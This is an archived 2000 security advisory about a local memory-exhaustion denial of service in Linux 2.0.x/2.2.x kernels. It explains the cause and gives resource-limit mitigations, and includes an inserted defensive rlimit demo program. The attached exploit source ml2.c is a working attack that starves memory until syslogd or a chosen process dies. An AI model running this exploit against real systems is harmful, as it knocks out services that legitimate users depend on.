Linux Kernel 2.0.x/2.2.x local Denial of Service attack

Sebastian (scut@nb.in-berlin.de)
Sun, 9 Jan 2000 16:04:51 +0100 (CET)



------

TESO Security Advisory
09/01/2000

Linux Kernel 2.0.x and 2.2.x local Denial of Service attack

Summary
===================

A weakness within the Linux 2.0.x and Linux 2.2.x kernels has been
discovered. It allows any local user who is not subject to resource
limits to crash arbitrary processes, including those owned by the
superuser, and can bring down the whole system.

Systems Affected
===================

All systems running the Linux kernel versions 2.0.x or 2.2.x with local
users who are not subject to resource limits.
Setting a limit only on the maximum number of processes per user (the
usual 'forkbomb' protection) is not enough, since a single process can
exhaust memory on its own.
Linux 2.3.x systems may be affected too; we did not test these versions.

Tests
===================

A crash of individual processes, or of the whole system, can be reproduced
using the included exploit file "ml2.c", written by Stealth [3].
We have successfully crashed Linux 2.0.x and 2.2.x systems with it.

Impact
===================

By crashing single processes, or the whole system, an attacker may render
the system unusable to every other user (including the superuser), or
selectively kill only important processes, denying services to legitimate
users.

Explanation
===================

Any user can request a large amount of memory, 'stealing' the space that
important processes (syslogd, klogd, ...) need. Once memory is exhausted,
the next operation of such a process that needs a fresh page (a page fault
on newly touched stack or heap, or a system call that must allocate) fails,
and the kernel responds by killing that process instead of returning an
error to it (see arch/{...}/mm/fault.c).
The exploit helps this along: when its own malloc() fails, it sends a
syslog message of nearly 10 KB, so that syslogd is the process that needs
memory at exactly the wrong moment.

There should be a mechanism that reserves a pool of memory for important
processes, accessible only to the kernel itself or to processes with an
(E)UID of 0.

The real problem is that unlimited resources are the default, and the
kernel hands out all available memory to unlimited processes. In the
kernel's eyes the process of an ordinary user has the same right to memory
as init.

Solution
===================

Since the problem can only be exploited by users who already have local
access, the best way to prevent this and other local attacks is to give
access only to users who can be trusted.

However, this problem lies within the Linux kernel and can definitely be
fixed there.
As general advice, administrators should make heavy use of resource limits
for all 'dangerous' resources (maximum number of processes, maximum
memory, ...) on untrusted accounts; a limit on the process count alone
does not stop this attack. Programs such as [4] should also be used on
important systems to prevent local DoS attacks.

The Linux kernel developers have been notified at the same time as the
public Linux community, so a safe patch should be available soon.
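The following program is an added example and is not part of this advisory
or of ml2.c. It shows the two halves of the argument above in code: how a
process can detect the "unlimited by default" state with getrlimit(), and
how capping RLIMIT_AS with setrlimit() (the call behind the shell's
`ulimit -v`) confines a runaway allocator of the ml2.c kind to its own
process, so its malloc() fails instead of starving syslogd. The function
names (has_unlimited_memory, cap_address_space, probe_alloc) and the 64 MiB
/ 256 MiB figures are this example's own choices.

```c
/* rlimit_demo.c: added example, not part of the TESO advisory or ml2.c.
 * Function names and the sizes used are assumptions of this example. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/resource.h>

/* Return 1 if neither RLIMIT_AS nor RLIMIT_DATA constrains the caller,
 * i.e. the "unlimited by default" state the advisory describes;
 * 0 if at least one soft limit is set, -1 if getrlimit() fails. */
int has_unlimited_memory(void)
{
    struct rlimit as, data;
    if (getrlimit(RLIMIT_AS, &as) != 0 || getrlimit(RLIMIT_DATA, &data) != 0)
        return -1;
    return as.rlim_cur == RLIM_INFINITY && data.rlim_cur == RLIM_INFINITY;
}

/* Lower the soft RLIMIT_AS of the calling process to 'bytes', never above
 * the current hard limit, so that it also works for an unprivileged user.
 * Returns the limit actually installed, or 0 on error. */
rlim_t cap_address_space(rlim_t bytes)
{
    struct rlimit rl;
    if (getrlimit(RLIMIT_AS, &rl) != 0)
        return 0;
    if (rl.rlim_max != RLIM_INFINITY && bytes > rl.rlim_max)
        bytes = rl.rlim_max;
    rl.rlim_cur = bytes;
    if (setrlimit(RLIMIT_AS, &rl) != 0)
        return 0;
    return bytes;
}

/* Try to obtain and touch 'total' bytes in 'chunk'-sized malloc() calls,
 * the way ml2.c does, but stop at the first failure instead of retrying.
 * Returns the number of bytes successfully allocated; everything is freed
 * again before returning. */
size_t probe_alloc(size_t total, size_t chunk)
{
    size_t n = total / chunk, got = 0, i;
    char **chunks = calloc(n, sizeof *chunks);
    if (chunks == NULL)
        return 0;
    for (i = 0; i < n; i++) {
        chunks[i] = malloc(chunk);
        if (chunks[i] == NULL)        /* RLIMIT_AS reached: mmap/brk refused */
            break;
        memset(chunks[i], 'X', chunk);  /* actually touch the pages */
        got += chunk;
    }
    for (i = 0; i < n && chunks[i] != NULL; i++)
        free(chunks[i]);
    free(chunks);
    return got;
}

int main(void)
{
    const size_t cap  = (size_t)64u << 20;   /* 64 MiB address-space cap */
    const size_t want = (size_t)256u << 20;  /* what the allocator wants */

    printf("unlimited memory limits: %s\n",
           has_unlimited_memory() == 1 ? "yes (the vulnerable default)" : "no");

    if (cap_address_space(cap) == 0) {
        perror("setrlimit(RLIMIT_AS)");
        return 1;
    }
    /* With the cap in place the loop stops well short of 256 MiB and the
     * process itself, not syslogd or init, is the one that runs dry. */
    printf("allocated %zu of %zu bytes under a %zu-byte RLIMIT_AS\n",
           probe_alloc(want, (size_t)1u << 20), want, cap);
    return 0;
}
```

On a multi-user system the same cap is applied per login rather than by
the program itself, e.g. through pam_limits (`/etc/security/limits.conf`,
item `as`, in KB), so it is in force before the user can run anything. A
cap on the number of processes alone does not help, since one process is
enough to exhaust memory. Later kernels (2.4 onward) introduced an OOM
killer that picks a victim by heuristics instead of killing whichever
process faults first, so the exact failure mode differs there, but the
defence for untrusted accounts is the same address-space limit.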

Acknowledgments
================

The bug discovery and further analysis were done by

S. Krahmer http://www.cs.uni-potsdam.de/homepages/students/linuxer

The exploit is due to

Stealth http://www.kalug.lug.net/stealth

This advisory has been written by scut and stealth.

Contact Information
===================

The teso crew can be reached by mailing to teso@shellcode.org.
Our webpage is at http://teso.scene.at/

"C-Skills" developers may be reached through [2].

References
===================

[1] TESO
http://teso.scene.at/

[2] S. Krahmer
http://www.cs.uni-potsdam.de/homepages/students/linuxer

[3] Stealth
http://www.kalug.lug.net/stealth/

[4] Fork Bomb Defuser
http://www.geocities.com/SiliconValley/Software/9197/rexfbd.htm

Disclaimer
===================

This advisory does not claim to be complete or to be usable for any
purpose. Especially information on the vulnerable systems may be
inaccurate or wrong. The supplied exploit is not to be used for malicious
purposes, but for educational purposes only.

This advisory is free for open distribution in unmodified form.
Articles that are based on information from this advisory should include
link [1] and [2].

Exploit
===================

We've created a working exploit to demonstrate the vulnerability.

The exploit is available on either

http://teso.scene.at/
or
http://www.cs.uni-potsdam.de/homepages/students/linuxer/

------

regards,
scut of teso

-- 
- scut@nb.in-berlin.de - http://nb.in-berlin.de/scut/ - sacbuctd@ircnet  --
-- you don't need a lot of people to be great, you need a few great to be --
-- the best -----------------------------------------------------------------
--- nuclear arrival weapon spy agent remain undercover, hi echelon ----------

------

ml2.c (attachment, written by Stealth [3])

/*
 * Copyright (C) 1999/2000 Stealth.
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *      This product includes software developed by Stealth.
 * 4. The name Stealth may not be used to endorse or promote
 *    products derived from this software without specific prior written
 *    permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
 * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <syslog.h>

/* Deliberate compile guard: the program does not build until this line
 * is removed, so nobody runs it without having read the warning below. */
#error

/*** !!! DANGER !!!
 *** This program may crash your whole system, causing damage of any kind,
 *** even data-loss. So be sure what you do.
 ***/

int main(int argc, char **argv)
{
    char foo[1000];                 /* /proc/<pid>/stat of the target */
    char bigmsg[10000];             /* oversized syslog message */
    char *s, *hold_s = NULL;        /* current and previous 10000-byte chunk */
    int i = 0;

    memset(bigmsg, 'X', sizeof(bigmsg) - 1);
    bigmsg[sizeof(bigmsg) - 1] = '\0';
    if (argc < 2) {
        printf("usage: %s <pid to kill>\n", argv[0]);
        exit(1);
    }
#if 0
    fork();
#endif
    memset(foo, 0, sizeof(foo));
    snprintf(foo, sizeof(foo), "/proc/%s/stat", argv[1]);

    /* check whether the target process is still alive; keep eating memory
     * in 10000-byte chunks (never freed) until it is gone */
    while (access(foo, F_OK) == 0) {
        s = malloc(10000);
        if (s == NULL) {
            /* out of memory: give back one chunk so that we can still run
             * ourselves, then force a root process (syslogd) to require
             * some memory, so maybe it dies before we die. :) */
            if (hold_s)
                free(hold_s);
/*          if (s)
                s[i%10000] = 0;
*/
            printf("crashing ... \n");

            openlog("b00m", 0, 0);
            syslog(LOG_ALERT, "%s", bigmsg);
            closelog();
        }
        printf("%d\r", i++); fflush(stdout);
        hold_s = s;
    }
    return 0;
}

- To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.rutgers.edu Please read the FAQ at http://www.tux.org/lkml/